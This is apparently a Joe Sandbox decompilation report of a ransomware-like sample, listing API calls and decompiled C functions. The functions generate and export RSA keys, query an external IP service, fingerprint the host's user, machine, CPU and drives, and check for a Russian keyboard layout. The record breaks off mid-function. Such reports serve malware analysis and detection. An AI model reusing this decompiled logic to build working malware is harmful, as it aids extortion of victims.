Part of subcall function 0FBB47D0: VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBB482C
Part of subcall function 0FBB47D0: lstrcpyW.KERNEL32 ref: 0FBB484F
Part of subcall function 0FBB47D0: lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBB4856
Part of subcall function 0FBB47D0: CreateMutexW.KERNEL32(00000000,00000000,00000000,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBB486E
Part of subcall function 0FBB47D0: GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBB487A
Part of subcall function 0FBB47D0: GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBB4881
Part of subcall function 0FBB47D0: VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBB489B

ExitProcess.KERNEL32 ref: 0FBB4B3C
CreateThread.KERNEL32 ref: 0FBB4B51
WaitForSingleObject.KERNEL32(00000000,00001388), ref: 0FBB4B69
TerminateThread.KERNEL32(00000000,00000000), ref: 0FBB4B7C
CloseHandle.KERNEL32(00000000), ref: 0FBB4B86
VirtualAlloc.KERNEL32(00000000,00000200,00003000,00000004,00000000,00000000,00000000,00000000), ref: 0FBB4BFA
GetModuleFileNameW.KERNEL32(00000000,00000000,00000100), ref: 0FBB4C14
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FBB4C2D
ExitProcess.KERNEL32 ref: 0FBB4C35

Strings

open, xrefs: 0FBB4D90

Memory Dump Source

Source File: 0000000B.00000002.320288020.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000B.00000002.320283406.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320296152.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320303150.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320307802.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: Virtual$AllocCreateErrorExitFreeLastProcessThread$CloseFileHandleModuleMutexNameObjectSingleSleepTerminateWaitlstrcpylstrlen
String ID: open
API String ID: 1803241880-2758837156
Opcode ID: cfaed11d6a0793b1a72b3c3462621a5ec17395bd63ac7dc31fb2c03516961217
Instruction ID: 1c22cc67a9ada22f5ce09b1687e559bf6716f38b3e2b36b5e6593ff178adbc73
Opcode Fuzzy Hash: cfaed11d6a0793b1a72b3c3462621a5ec17395bd63ac7dc31fb2c03516961217
Instruction Fuzzy Hash: A271EA70A40308EBEB14EFA5EC59BEE7B78BB04712F504058E601BA1C2DBF86945CF65

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB82B0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 111
encryptionlibrarymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 66%

			E0FBB82B0(intOrPtr __ecx, void* __edx) {
				long* _v8;
				intOrPtr _v12;
				signed int _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v34;
				short _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				char _v48;
				long** _t37;
				void* _t40;
				struct HINSTANCE__* _t45;
				_Unknown_base(*)()* _t46;
				signed int _t54;
				long _t55;
				intOrPtr _t56;
				signed int _t58;
				signed int _t60;
				void* _t63;
				void* _t64;
				void* _t65;

				_t54 = 0;
				_v12 = __ecx;
				_t37 =  &_v8;
				_t63 = __edx;
				__imp__CryptAcquireContextW(_t37, 0, 0, 1, 0xf0000000); // executed
				if(_t37 == 0) {
					L15:
					return _t54;
				} else {
					_t58 = 0;
					do {
						_t3 = _t58 + 0x61; // 0x61
						 *((short*)(_t65 + _t58 * 2 - 0x64)) = _t3;
						_t58 = _t58 + 1;
					} while (_t58 < 0x1a);
					_t7 = _t63 + 1; // 0x1
					_t55 = _t7;
					_t40 = VirtualAlloc(0, _t55, 0x3000, 0x40); // executed
					_t64 = _t40;
					if(_t64 == 0 || _t63 >= _t55) {
						CryptReleaseContext(_v8, 0);
						VirtualFree(_t64, 0, 0x8000);
						return 0;
					} else {
						_v48 = 0x70797243;
						_v44 = 0x6e654774;
						_v40 = 0x646e6152;
						_v36 = 0x6d6f;
						_v34 = 0;
						_v32 = 0x61766441;
						_v28 = 0x32336970;
						_v24 = 0x6c6c642e;
						_v20 = 0;
						_t45 = GetModuleHandleA( &_v32);
						if(_t45 != 0) {
							L7:
							_t19 =  &_v48; // 0x70797243
							_t46 = GetProcAddress(_t45, _t19);
							if(_t46 == 0) {
								goto L13;
							} else {
								_push(_t64);
								_push(_t63);
								_push(_v8);
								if( *_t46() == 0) {
									goto L13;
								} else {
									_t60 = 0;
									if(_t63 != 0) {
										_t56 = _v12;
										_v16 = 0x1a;
										do {
											asm("cdq");
											 *((short*)(_t56 + _t60 * 2)) =  *((intOrPtr*)(_t65 + ( *(_t64 + _t60) & 0x000000ff) % _v16 * 2 - 0x64));
											_t60 = _t60 + 1;
										} while (_t60 < _t63);
									}
									_t54 = 1;
								}
							}
						} else {
							_t18 =  &_v32; // 0x61766441
							_t45 = LoadLibraryA(_t18);
							if(_t45 == 0) {
								L13:
								_t54 = 0;
							} else {
								goto L7;
							}
						}
						CryptReleaseContext(_v8, 0);
						VirtualFree(_t64, 0, 0x8000); // executed
						goto L15;
					}
				}
			}

0x0fbb82c0
0x0fbb82c2
0x0fbb82c7
0x0fbb82ca
0x0fbb82cd
0x0fbb82d5
0x0fbb83c9
0x0fbb83d1
0x0fbb82db
0x0fbb82db
0x0fbb82e0
0x0fbb82e0
0x0fbb82e3
0x0fbb82e8
0x0fbb82e9
0x0fbb82f5
0x0fbb82f5
0x0fbb82fb
0x0fbb8301
0x0fbb8305
0x0fbb83d7
0x0fbb83e5
0x0fbb83f3
0x0fbb8313
0x0fbb8316
0x0fbb831e
0x0fbb8325
0x0fbb832c
0x0fbb8332
0x0fbb8336
0x0fbb833d
0x0fbb8344
0x0fbb834b
0x0fbb834f
0x0fbb8357
0x0fbb8367
0x0fbb8367
0x0fbb836c
0x0fbb8374
0x00000000
0x0fbb8376
0x0fbb8376
0x0fbb8377
0x0fbb8378
0x0fbb837f
0x00000000
0x0fbb8381
0x0fbb8381
0x0fbb8385
0x0fbb8387
0x0fbb838a
0x0fbb8391
0x0fbb8395
0x0fbb839e
0x0fbb83a2
0x0fbb83a3
0x0fbb8391
0x0fbb83a7
0x0fbb83a7
0x0fbb837f
0x0fbb8359
0x0fbb8359
0x0fbb835d
0x0fbb8365
0x0fbb83ae
0x0fbb83ae
0x00000000
0x00000000
0x00000000
0x0fbb8365
0x0fbb83b5
0x0fbb83c3
0x00000000
0x0fbb83c3
0x0fbb8305

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 0FBB82CD
VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 0FBB82FB
GetModuleHandleA.KERNEL32(?), ref: 0FBB834F
LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0FBB835D
GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0FBB836C
CryptReleaseContext.ADVAPI32(?,00000000), ref: 0FBB83B5
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0FBB83C3
CryptReleaseContext.ADVAPI32(?,00000000), ref: 0FBB83D7
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FBB83E5

Strings

Advapi32.dll, xrefs: 0FBB8359, 0FBB835C
CryptGenRandomAdvapi32.dll, xrefs: 0FBB8367, 0FBB836A

Memory Dump Source

Source File: 0000000B.00000002.320288020.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000B.00000002.320283406.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320296152.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320303150.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320307802.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: ContextCryptVirtual$FreeRelease$AcquireAddressAllocHandleLibraryLoadModuleProc
String ID: Advapi32.dll$CryptGenRandomAdvapi32.dll
API String ID: 3996966626-2152921537
Opcode ID: e47e809a91679ac6c20bf6a547b297464a73c028a7086c3ac1fe89c7ff85e9c7
Instruction ID: 73cdf576489d7c319555debe4cde0208425cd092dcb2ce994ea839166ba2a878
Opcode Fuzzy Hash: e47e809a91679ac6c20bf6a547b297464a73c028a7086c3ac1fe89c7ff85e9c7
Instruction Fuzzy Hash: 5031D370A00209ABDB208FA5EC85BEEBB7CFF05711F54406DF901A6241EBB4D612CF65

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB63E0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 16%

			E0FBB63E0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				long* _v8;
				long* _v12;
				int _v16;
				long** _t15;
				long* _t16;
				long _t23;

				_t15 =  &_v8;
				__imp__CryptAcquireContextW(_t15, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 0xf0000000); // executed
				if(_t15 != 0) {
					L6:
					_t16 = _v8;
					__imp__CryptGenKey(_t16, 0xa400, 0x8000001,  &_v12); // executed
					if(_t16 == 0) {
					}
					_v16 = 0;
					__imp__CryptExportKey(_v12, 0, 6, 0, _a4, _a8);
					__imp__CryptExportKey(_v12, 0, 7, 0, _a12, _a16); // executed
					CryptDestroyKey(_v12);
					CryptReleaseContext(_v8, 0);
					__imp__CryptAcquireContextW( &_v8, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 0x10); // executed
					return 1;
				}
				_t23 = GetLastError();
				if(_t23 != 0x80090016) {
					return 0;
				}
				__imp__CryptAcquireContextW( &_v8, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
				if(_t23 != 0) {
					goto L6;
				}
				return 0;
			}

0x0fbb63f4
0x0fbb63f8
0x0fbb6400
0x0fbb6438
0x0fbb6446
0x0fbb644a
0x0fbb6452
0x0fbb6452
0x0fbb6455
0x0fbb646e
0x0fbb6486
0x0fbb6490
0x0fbb649c
0x0fbb64b1
0x00000000
0x0fbb64b7
0x0fbb6402
0x0fbb640d
0x00000000
0x0fbb6431
0x0fbb641e
0x0fbb6426
0x00000000
0x0fbb642f
0x00000000

APIs

CryptAcquireContextW.ADVAPI32(0FBB4B9E,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,F0000000,0FBB4B96,?,0FBB4B9E), ref: 0FBB63F8
GetLastError.KERNEL32(?,0FBB4B9E), ref: 0FBB6402
CryptAcquireContextW.ADVAPI32(0FBB4B9E,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,0FBB4B9E), ref: 0FBB641E
CryptGenKey.ADVAPI32(0FBB4B9E,0000A400,08000001,?,?,0FBB4B9E), ref: 0FBB644A
CryptExportKey.ADVAPI32(?,00000000,00000006,00000000,?,00000000), ref: 0FBB646E
CryptExportKey.ADVAPI32(?,00000000,00000007,00000000,?,?), ref: 0FBB6486
CryptDestroyKey.ADVAPI32(?), ref: 0FBB6490
CryptReleaseContext.ADVAPI32(0FBB4B9E,00000000), ref: 0FBB649C
CryptAcquireContextW.ADVAPI32(0FBB4B9E,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000010), ref: 0FBB64B1

Strings

Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 0FBB63ED, 0FBB6413, 0FBB64A6

Memory Dump Source

Source File: 0000000B.00000002.320288020.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000B.00000002.320283406.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320296152.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320303150.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320307802.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: Crypt$Context$Acquire$Export$DestroyErrorLastRelease
String ID: Microsoft Enhanced Cryptographic Provider v1.0
API String ID: 137402220-1948191093
Opcode ID: e53495227fbb1f400b11d5c68bfc870a815c36333c218bdaa53aa2b0c9e25879
Instruction ID: 580ba2b0c3025ba0c8d62679d1d3925871d736042338342b7074dcb3a41acd03
Opcode Fuzzy Hash: e53495227fbb1f400b11d5c68bfc870a815c36333c218bdaa53aa2b0c9e25879
Instruction Fuzzy Hash: CF213275B80305BBDB20CBA5ED4AFEA376DA744B11F504488FA01AB1C0D6F9A9519F60

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB6FF0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 56stringmemorynetworkCOMMON

Download Yara Rule

APIs

Part of subcall function 0FBB7E40: InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0FBB8024
Part of subcall function 0FBB7E40: InternetOpenW.WININET(006F004D,00000001,00000000,00000000,10000000), ref: 0FBB803D

VirtualAlloc.KERNEL32(00000000,00002801,00003000,00000040,74CB66A0,?), ref: 0FBB700F
lstrlenW.KERNEL32(0FBBFF8C), ref: 0FBB701C

Part of subcall function 0FBB8050: InternetCloseHandle.WININET(?), ref: 0FBB8063
Part of subcall function 0FBB8050: InternetConnectW.WININET(?,00000000,00000050,00000000,00000000,00000003,00000000,00000000), ref: 0FBB8082

lstrlenA.KERNEL32(00000000,ipv4bot.whatismyipaddress.com,0FBBFF90,00000000,00000000,00000000,000027FF,?,00000000), ref: 0FBB704B
wsprintfW.USER32 ref: 0FBB7063
VirtualFree.KERNELBASE(00000000,00000000,00008000,ipv4bot.whatismyipaddress.com,0FBBFF90,00000000,00000000,00000000,000027FF,?,00000000), ref: 0FBB7079
InternetCloseHandle.WININET(?), ref: 0FBB7087

Strings

GET, xrefs: 0FBB7024
ipv4bot.whatismyipaddress.com, xrefs: 0FBB703C

Memory Dump Source

Source File: 0000000B.00000002.320288020.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000B.00000002.320283406.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320296152.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320303150.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320307802.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleOpenVirtuallstrlen$AllocConnectFreewsprintf
String ID: GET$ipv4bot.whatismyipaddress.com
API String ID: 4289327240-2259699238
Opcode ID: f800e2b1374c89b0852572bf8f19c3298aa624b1a7cbdd9bfc3961062a00bc7b
Instruction ID: b44fdcebf09c05760c864e45df098eba9a1a40f31719b1aa17e7400e2053b151
Opcode Fuzzy Hash: f800e2b1374c89b0852572bf8f19c3298aa624b1a7cbdd9bfc3961062a00bc7b
Instruction Fuzzy Hash: BA015B35A412007BD6606A66AC4DFFF3A2DEBC6B12F504068F905E21C1DEE89516CEA5

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB2F50 Relevance: 10.6, APIs: 7, Instructions: 86
memoryCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E0FBB2F50(WCHAR* __ecx) {
				unsigned int _v8;
				char _v12;
				WCHAR* _v16;
				short _v2064;
				long _t17;
				void* _t18;
				void* _t20;
				WCHAR* _t23;
				int _t25;
				void* _t28;
				unsigned int _t31;
				void* _t35;
				intOrPtr* _t39;
				signed int _t40;

				_t39 = __imp__EnumDeviceDrivers;
				_v16 = __ecx;
				_v8 = 0;
				 *_t39( &_v12, 4,  &_v8); // executed
				_t17 = _v8;
				if(_t17 != 0) {
					_t18 = VirtualAlloc(0, _t17, 0x3000, 4); // executed
					_t35 = _t18;
					if(_t35 != 0) {
						_t20 =  *_t39(_t35, _v8,  &_v12, _t28); // executed
						if(_t20 == 0) {
							L10:
							VirtualFree(_t35, 0, 0x8000); // executed
							return 0;
						} else {
							_t40 = 0;
							_t31 = _v8 >> 2;
							if(_t31 > 0) {
								do {
									_t23 =  &_v2064;
									__imp__GetDeviceDriverBaseNameW( *((intOrPtr*)(_t35 + _t40 * 4)), _t23, 0x400); // executed
									if(_t23 == 0) {
										goto L9;
									} else {
										_t25 = lstrcmpiW( &_v2064, _v16); // executed
										if(_t25 == 0) {
											VirtualFree(_t35, 0, 0x8000);
											return 1;
										} else {
											goto L9;
										}
									}
									goto L12;
									L9:
									_t40 = _t40 + 1;
								} while (_t40 < _t31);
							}
							goto L10;
						}
					} else {
						return _t18;
					}
				} else {
					return _t17;
				}
				L12:
			}

0x0fbb2f5a
0x0fbb2f69
0x0fbb2f6d
0x0fbb2f74
0x0fbb2f76
0x0fbb2f7b
0x0fbb2f8d
0x0fbb2f93
0x0fbb2f97
0x0fbb2fa8
0x0fbb2fac
0x0fbb2ff2
0x0fbb2ffa
0x0fbb3008
0x0fbb2fae
0x0fbb2fb1
0x0fbb2fb3
0x0fbb2fb8
0x0fbb2fc0
0x0fbb2fc5
0x0fbb2fcf
0x0fbb2fd7
0x00000000
0x0fbb2fd9
0x0fbb2fe3
0x0fbb2feb
0x0fbb3011
0x0fbb3022
0x00000000
0x00000000
0x00000000
0x0fbb2feb
0x00000000
0x0fbb2fed
0x0fbb2fed
0x0fbb2fee
0x0fbb2fc0
0x00000000
0x0fbb2fb8
0x0fbb2f99
0x0fbb2f9e
0x0fbb2f9e
0x0fbb2f81
0x0fbb2f81
0x0fbb2f81
0x00000000

APIs

K32EnumDeviceDrivers.KERNEL32(?,00000004,?), ref: 0FBB2F74
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 0FBB2F8D

Memory Dump Source

Source File: 0000000B.00000002.320288020.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000B.00000002.320283406.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320296152.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320303150.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320307802.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: AllocDeviceDriversEnumVirtual
String ID:
API String ID: 4140748134-0
Opcode ID: c621b5e75c907428f913ec0e3059c8ee4d245d2e7935c2f65ca2a08ad183670d
Instruction ID: a5257816f5e1aabd72f51b9efed5df300eac8a8662ddede725f0ba8bc10c5160
Opcode Fuzzy Hash: c621b5e75c907428f913ec0e3059c8ee4d245d2e7935c2f65ca2a08ad183670d
Instruction Fuzzy Hash: 7B21AA32A00219BBEB219E99AC45FF977BCEB44712F1041E6FE04E7180D7B5A9159F90

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB7490 Relevance: 142.2, APIs: 55, Strings: 26, Instructions: 499
memorystringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 88%

			E0FBB7490(DWORD* __ecx, void* __edx) {
				void* _v8;
				void* _v12;
				long _v16;
				long _v20;
				int _v24;
				int _v28;
				intOrPtr _v32;
				short _v36;
				short _v40;
				WCHAR* _v44;
				WCHAR* _v48;
				WCHAR* _v52;
				WCHAR* _v56;
				WCHAR* _v60;
				WCHAR* _v64;
				WCHAR* _v68;
				signed short _v76;
				char _v132;
				void* _t154;
				long _t155;
				WCHAR* _t157;
				short _t158;
				short _t159;
				short _t160;
				signed int _t161;
				signed int _t164;
				signed int _t166;
				int _t178;
				void* _t181;
				signed int _t183;
				signed int _t186;
				WCHAR* _t190;
				void* _t191;
				void* _t199;
				_Unknown_base(*)()* _t204;
				signed int _t211;
				intOrPtr _t216;
				WCHAR* _t218;
				WCHAR* _t220;
				void* _t221;
				void* _t224;
				WCHAR* _t226;
				long _t229;
				int _t230;
				long _t234;
				void* _t238;
				long _t240;
				long _t243;
				WCHAR* _t246;
				void* _t247;
				WCHAR* _t249;
				WCHAR* _t250;
				WCHAR* _t252;
				void* _t256;
				DWORD* _t260;
				short* _t261;
				DWORD* _t266;
				void* _t267;
				signed int _t270;
				void* _t274;
				void* _t276;
				void* _t277;
				DWORD* _t279;
				void* _t280;
				void* _t281;

				_t267 = __edx;
				_t260 = __ecx;
				_t279 = __ecx;
				if( *__ecx != 0) {
					_t252 = VirtualAlloc(0, 0x202, 0x3000, 4); // executed
					_t260 =  &_v24;
					 *(_t279 + 8) = _t252;
					_v24 = 0x100;
					GetUserNameW(_t252, _t260); // executed
				}
				if( *((intOrPtr*)(_t279 + 0xc)) != 0) {
					_v24 = 0x1e;
					_t250 = VirtualAlloc(0, 0x20, 0x3000, 4); // executed
					_t260 =  &_v24;
					 *(_t279 + 0x14) = _t250;
					GetComputerNameW(_t250, _t260);
				}
				if( *((intOrPtr*)(_t279 + 0x18)) == 0) {
					L11:
					if( *(_t279 + 0x30) == 0) {
						L18:
						if( *((intOrPtr*)(_t279 + 0x3c)) == 0) {
							L31:
							if( *((intOrPtr*)(_t279 + 0x48)) != 0) {
								_t220 = VirtualAlloc(0, 0x82, 0x3000, 4); // executed
								_push(_t260);
								 *(_t279 + 0x50) = _t220;
								_t221 = E0FBB7410(_t260, 0x80000002, L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", L"productName", _t220, 0x80); // executed
								if(_t221 == 0) {
									_push(_t260);
									E0FBB7410(_t260, 0x80000002, L"SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion", L"productName",  *(_t279 + 0x50), 0x80);
									wsprintfW( *(_t279 + 0x50), L"error");
									_t281 = _t281 + 8;
								}
							}
							if( *((intOrPtr*)(_t279 + 0x54)) == 0) {
								L44:
								if( *((intOrPtr*)(_t279 + 0x24)) != 0) {
									_v28 = 0;
									_t216 = E0FBB7B70(_t279 + 0x2c,  &_v28); // executed
									if(_t216 == 0) {
										 *((intOrPtr*)(_t279 + 0x24)) = _t216;
									}
								}
								if( *((intOrPtr*)(_t279 + 0x60)) != 0) {
									_t190 = VirtualAlloc(0, 0x400, 0x3000, 4); // executed
									 *(_t279 + 0x68) = _t190;
									_t191 = VirtualAlloc(0, 0xe0c, 0x3000, 4); // executed
									_t276 = _t191;
									GetWindowsDirectoryW(_t276, 0x100);
									_t66 = _t276 + 0x600; // 0x600
									_t266 = _t66;
									 *((short*)(_t276 + 6)) = 0;
									_t68 = _t276 + 0x400; // 0x400
									_t69 = _t276 + 0x604; // 0x604
									_t70 = _t276 + 0x608; // 0x608
									_t71 = _t276 + 0x200; // 0x200
									GetVolumeInformationW(_t276, _t71, 0x100, _t266, _t70, _t69, _t68, 0x100); // executed
									_push(_t266);
									_t72 = _t276 + 0x60c; // 0x60c
									_t260 = _t72;
									_t199 = E0FBB7410(_t260, 0x80000002, L"HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0", L"ProcessorNameString", _t260, 0x80); // executed
									if(_t199 != 0) {
										_t73 = _t276 + 0x60c; // 0x60c
										_t211 = lstrlenW(_t73);
										_t74 = _t276 + 0x60c; // 0x60c
										_t260 = _t74;
										_push(_t260);
										E0FBB7410(_t260, 0x80000002, L"HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0", L"Identifier", _t260 + _t211 * 2, 0x80); // executed
									}
									wsprintfW( *(_t279 + 0x68), L"%d",  *(_t276 + 0x600));
									_t79 = _t276 + 0x60c; // 0x60c
									_t281 = _t281 + 0xc;
									lstrcatW( *(_t279 + 0x68), _t79);
									_t204 = GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "RtlComputeCrc32");
									_v28 = _t204;
									if(_t204 == 0) {
										 *(_t279 + 0x6c) = 0;
									} else {
										 *(_t279 + 0x6c) = _v28(0x29a,  *(_t279 + 0x68), lstrlenW( *(_t279 + 0x68)) + _t207);
									}
									 *(_t279 + 0x70) =  *(_t276 + 0x600);
									VirtualFree(_t276, 0, 0x8000); // executed
								}
								if( *((intOrPtr*)(_t279 + 0x74)) == 0) {
									L67:
									if( *(_t279 + 0x80) == 0) {
										L72:
										return 1;
									}
									_t154 = VirtualAlloc(0, 0x81, 0x3000, 4); // executed
									 *(_t279 + 0x84) = _t154;
									if(_t154 == 0) {
										L71:
										 *(_t279 + 0x80) = 0;
										goto L72;
									}
									_push(_t260);
									_t155 = E0FBB6FF0(_t154); // executed
									if(_t155 != 0) {
										goto L72;
									}
									VirtualFree( *(_t279 + 0x84), _t155, 0x8000); // executed
									goto L71;
								} else {
									_v68 = L"UNKNOWN";
									_v64 = L"NO_ROOT_DIR";
									_v60 = L"REMOVABLE";
									_v56 = L"FIXED";
									_v52 = L"REMOTE";
									_v48 = L"CDROM";
									_v44 = L"RAMDISK";
									_t157 = VirtualAlloc(0, 0x400, 0x3000, 4); // executed
									 *(_t279 + 0x7c) = _t157;
									_t261 =  &_v132;
									_t158 = 0x41;
									do {
										 *_t261 = _t158;
										_t261 = _t261 + 2;
										_t158 = _t158 + 1;
									} while (_t158 <= 0x5a);
									_t159 =  *L"?:\\"; // 0x3a003f
									_v40 = _t159;
									_t160 =  *0xfbbf350; // 0x5c
									_v36 = _t160;
									_t161 = 0;
									_v24 = 0;
									do {
										_v40 =  *((intOrPtr*)(_t280 + _t161 * 2 - 0x80));
										_t164 = GetDriveTypeW( &_v40); // executed
										_t270 = _t164;
										if(_t270 > 2 && _t270 != 5) {
											_v36 = 0;
											lstrcatW( *(_t279 + 0x7c),  &_v40);
											_v36 = 0x5c;
											lstrcatW( *(_t279 + 0x7c),  *(_t280 + _t270 * 4 - 0x40));
											lstrcatW( *(_t279 + 0x7c), "_");
											_t178 = GetDiskFreeSpaceW( &_v40,  &_v28,  &_v20,  &_v12,  &_v16); // executed
											if(_t178 == 0) {
												lstrcatW( *(_t279 + 0x7c), L"0,");
												goto L64;
											}
											_v8 = E0FBB8AB0(_v16, 0, _v28 * _v20, 0);
											_t256 = _t267;
											_t181 = E0FBB8AB0(_v12, 0, _v28 * _v20, 0);
											_t274 = _v8;
											_v32 = _t274 - _t181;
											asm("sbb eax, edx");
											_v8 = _t256;
											_t183 = lstrlenW( *(_t279 + 0x7c));
											_push(_t256);
											wsprintfW( &(( *(_t279 + 0x7c))[_t183]), L"%I64u/", _t274);
											_t186 = lstrlenW( *(_t279 + 0x7c));
											_push(_v8);
											wsprintfW( &(( *(_t279 + 0x7c))[_t186]), L"%I64u", _v32);
											_t281 = _t281 + 0x20;
											lstrcatW( *(_t279 + 0x7c), ",");
										}
										_t161 = _v24 + 1;
										_v24 = _t161;
									} while (_t161 < 0x1b);
									_t166 = lstrlenW( *(_t279 + 0x7c));
									_t260 =  *(_t279 + 0x7c);
									 *((short*)(_t260 + _t166 * 2 - 2)) = 0;
									goto L67;
								}
							} else {
								__imp__GetNativeSystemInfo( &_v76); // executed
								_t218 = VirtualAlloc(0, 0x40, 0x3000, 4); // executed
								_t260 = _v76 & 0x0000ffff;
								 *(_t279 + 0x5c) = _t218;
								if(_t260 > 9) {
									L42:
									_push(L"Unknown");
									L43:
									wsprintfW(_t218, ??);
									_t281 = _t281 + 8;
									goto L44;
								}
								_t260 =  *(_t260 + E0FBB7B60) & 0x000000ff;
								switch( *((intOrPtr*)(_t260 * 4 +  &M0FBB7B4C))) {
									case 0:
										_push(L"x86");
										goto L43;
									case 1:
										_push(L"ARM");
										goto L43;
									case 2:
										_push(L"Itanium");
										goto L43;
									case 3:
										_push(L"x64");
										goto L43;
									case 4:
										goto L42;
								}
							}
						}
						_t224 = VirtualAlloc(0, 0x8a, 0x3000, 4); // executed
						_v8 = _t224;
						_v20 = _t224 + 0xe;
						_t226 = VirtualAlloc(0, 4, 0x3000, 4); // executed
						 *(_t279 + 0x44) = _t226;
						_t277 = 1;
						_v24 = 1;
						do {
							wsprintfW(_v8, L"%d", _t277);
							_t281 = _t281 + 0xc;
							_v16 = 0;
							_t277 = _t277 + 1;
							_t229 = RegOpenKeyExW(0x80000001, L"Keyboard Layout\\Preload", 0, 0x20019,  &_v12); // executed
							if(_t229 != 0) {
								L27:
								_t230 = 0;
								_v24 = 0;
								goto L28;
							}
							_v28 = 0x80;
							_t234 = RegQueryValueExW(_v12, _v8, 0, 0, _v20,  &_v28); // executed
							if(_t234 != 0) {
								GetLastError();
							} else {
								_v16 = 1;
							}
							RegCloseKey(_v12); // executed
							if(_v16 == 0) {
								goto L27;
							} else {
								if(lstrcmpiW(_v20, L"00000419") == 0) {
									_t218 = wsprintfW( *(_t279 + 0x44), "1");
